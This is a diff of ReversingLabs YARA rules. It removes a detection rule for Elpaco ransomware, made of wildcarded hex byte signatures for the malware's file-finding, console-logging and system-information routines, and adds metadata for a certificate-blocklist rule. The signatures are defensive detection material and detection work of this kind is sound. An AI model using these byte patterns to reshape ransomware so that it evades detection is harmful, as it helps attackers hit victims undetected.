-rule REVERSINGLABS_Win32_Ransomware_Elpaco : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Elpaco ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb3a6293-f10c-55c4-960a-339e1e7922fe"
-		date = "2025-02-27"
-		modified = "2025-02-27"
+		id = "76be58d9-d1a3-5dec-807e-941714be80f9"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Elpaco.yara#L1-L316"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12572-L12588"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b3fdd586c9f3e5c40782c814b5091b28e88f3d74032c392a6479182eb74327a"
+		logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Elpaco"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ??
-            ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 6A ?? 66 0F 13 45 ?? 6A ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 6A
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 7E ?? 8D 85 ?? ?? ?? ?? 50 57 56 E8 ?? ?? ?? ?? 8B 55 ??
-            B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 5D ?? 83 C2 ?? 89 46 ?? 89 55 ??
-            89 07 0F 84 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B F2 8B 03 8D 4D ?? 8B 40 ?? 50 89 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? B8 ?? ?? ?? ?? 47 C6 45 ?? ?? F7 E7 8B
-            CF 89 BD ?? ?? ?? ?? C1 EA ?? 6B C2 ?? 2B C8 75 ?? 57 39 8D ?? ?? ?? ?? 75 ?? 68 ??
-            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ??
-            8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B BD ?? ?? ?? ?? 0F 43 4D ?? 50 51 68
-            ?? ?? ?? ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 BF ?? ?? ?? ?? ?? 75 ?? 83
-        }
-		$find_files_p2 = {
-            7D ?? ?? 8D 4D ?? 0F 43 4D ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ??
-            ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 74 ?? 8B 4F ?? 83 F9 ?? 72 ?? 8B 07 8D 0C 4D ?? ??
-            ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? 6A ?? C7 47 ??
-            ?? ?? ?? ?? 57 66 89 07 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 4E 6A ?? 52 89 75 ?? 8B 4A ??
-            8B 02 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? A9 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 85 ?? ??
-            ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4 89 A5 ?? ?? ?? ?? 33
-            C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 0F 1F 80 ?? ?? ?? ??
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
-            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8B 3D ?? ?? ?? ?? 8D 5D
-            ?? 83 7D ?? ?? 0F 43 5D ?? 8B 37 3B F7 74 ?? 83 7E ?? ?? 8D 46 ?? 72 ?? 8B 00 50 53
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 36 3B F7 75 ?? 8B 9D ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ??
-            ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43 45 ?? 50 E8 ??
-            ?? ?? ?? 8B 73 ?? 8D 85 ?? ?? ?? ?? 50 56 53 E8 ?? ?? ?? ?? 8B 55 ?? B9
-        }
-		$find_files_p3 = {
-            2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 42 8B 5D ?? 89 55 ?? 89 06 89 9D ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4
-            89 A5 ?? ?? ?? ?? 33 C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
-            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 83 EC ?? 8D 45 ?? 8B CC
-            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 7C
-            ?? 85 F6 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75
-            ?? A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 87 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
-            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 8B 4E ?? 83 F9 ?? 72 ??
-            8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ??
-            83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 46 ?? ?? ??
-            ?? ?? 6A ?? C7 46 ?? ?? ?? ?? ?? 56 66 89 06 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 8B 75 ??
-            6A ?? 4E 8B 4A ?? 8B 02 52 89 75 ?? 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83
-        }
-		$find_files_p4 = {
-            C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
-            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 33 C0 8B 55
-            ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 03 89 1B 89 5B
-            ?? 3B C3 74 ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 3B F3 75 ?? 6A ?? 53 E8
-            ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ??
-            8B 03 89 1B 89 5B ?? 3B C3 0F 84 ?? ?? ?? ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8B C6 3B F3 75 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
-            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$write_console_log_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? F0 0F B1 0A 85 C0 0F 84
-            ?? ?? ?? ?? 8B 45 ?? 8D 7C 24 ?? 85 C0 B9 ?? ?? ?? ?? 0F 45 C8 8D 45 ?? 50 33 F6 8B
-            C7 56 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 FF 70 ?? 83 C9 ?? 51 E8 ?? ?? ?? ??
-            83 C9 ?? 83 C4 ?? 85 C0 0F 48 C1 85 C0 78 ?? 3D ?? ?? ?? ?? 77 ?? 75 ?? EB ?? BE ??
-            ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 44 44 ?? 89 44 24 ?? 85 F6
-            79 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? BA ?? ?? ?? ?? 50 8D 44 24 ?? 50 51 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 75 ?? 8B 44 24 ?? 8B F8 8D 44 24 ?? 2B F8 83
-            E7 ?? 85 FF 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 50 0F
-            B7 44 24 ?? 50 0F B7 44 24 ?? 50 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? F6 C1 ?? 74 ?? 8B 15 ?? ?? ?? ?? 83 FA ?? 74 ?? 6A ?? 8D 44 24
-            ?? 50 8D 04 36 8B 35 ?? ?? ?? ?? 50 8D 44 24 ?? 50 52 FF D6 6A ?? 8D 44 24 ?? 50 57
-            8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF
-        }
-		$write_console_log_p2 = {
-            35 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? F6 C1 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 6A ?? 6A ?? 6A ?? 8B D8 8D 84
-            24 ?? ?? ?? ?? 53 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 0C 7D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B F0 8D 84 24 ?? ?? ?? ?? 56 53 50 6A ?? 6A ??
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 3D ?? ??
-            ?? ?? ?? 74 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF D3 8D 04 45 ?? ?? ?? ?? 89
-            44 24 ?? 8D 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
-            6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$get_system_information_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 0F 44 C3 6A ?? A2 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6
-            B9 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
-            68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CA
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? ?? ?? 8D 79 ?? 66 8B 01
-            83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 1F 84 00
-        }
-		$get_system_information_p2 = {
-            C6 00 ?? 8D 40 ?? 83 E9 ?? 75 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 57 C0 8B 85 ?? ?? ?? ?? 8B
-            8D ?? ?? ?? ?? 0F AC C6 ?? 8B 85 ?? ?? ?? ?? 0F AC C1 ?? 6A ?? 66 0F 13 85 ?? ?? ??
-            ?? 6A ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 BD
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
-            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 45 C3 A2 ?? ?? ?? ?? 33 F6 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? FF D3 68 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B F0 33
-            C0 85 F6 0F 44 C8 8D 85 ?? ?? ?? ?? 50 51 56 6A ?? FF B5 ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 0F 1F 44 00 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 85
-            F6 74 ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? FF D3 56 6A ?? 50 FF
-            15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 56 6A ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-        }
-		$get_system_information_p3 = {
-            B5 ?? ?? ?? ?? 33 DB 3B 1E 0F 83 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? C6 05 ?? ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? F6 44 DE ?? ?? B9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 0F 45 C1
-            A2 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B 54 DE ?? 8B 4C DE ?? 50 E8 ?? ?? ?? ?? 8B 47 ??
-            8D 8D ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 51 50 57 E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 42 89 47 ?? 89
-            95 ?? ?? ?? ?? 89 01 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 43 E9 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
-            C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 50 0F 43 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ??
-            8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ?? ?? ?? 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ??
-            ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50
-        }
-		$get_system_information_p4 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 45 ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ??
-            ?? ?? 41 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8B BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85
-            F6 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B CA C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ??
-            ?? ?? ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B 8D ?? ?? ??
-            ?? D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B6 0D ??
-            ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 45 CB A3 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 0F 95 05 ?? ?? ?? ?? 88 0D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 0F 94 05 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15
-        }
-		$everything_library_setup_p1 = {
